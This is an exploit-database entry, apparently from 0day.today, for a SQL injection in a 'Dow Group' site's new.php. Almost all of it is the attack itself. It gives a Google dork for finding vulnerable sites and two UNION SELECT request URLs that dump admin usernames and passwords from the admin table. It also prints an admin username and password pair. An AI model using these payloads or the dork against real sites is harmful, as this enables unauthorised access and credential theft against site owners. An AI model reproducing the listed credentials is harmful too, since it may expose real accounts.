id: 9990
date: 11/16/2009
title: Dow Group (new.php) SQL Injection
author: ProF.Code
cves: 

=================================
Dow Group (new.php) SQL Injection
=================================

=====================================
| Dow Group admin by pass (new.php)
=====================================
Author:ProF.Code
=====================================
~~~~~~~~~~~~~~~~~~~~
dork(google) : intext:"powered and designed by Dow Group"
~~~~~~~~~~~~~~~~~~~~
demo (username): http://server/new.php?id=-9+union+select+1,user_name,3,4+from+admin
demo (password) : http://server/new.php?id=-9+union+select+1,password,3,4+from+admin
user : nabadmin
pass : nabadmin_123
=============================================================



#  0day.today [2023-03-26]  #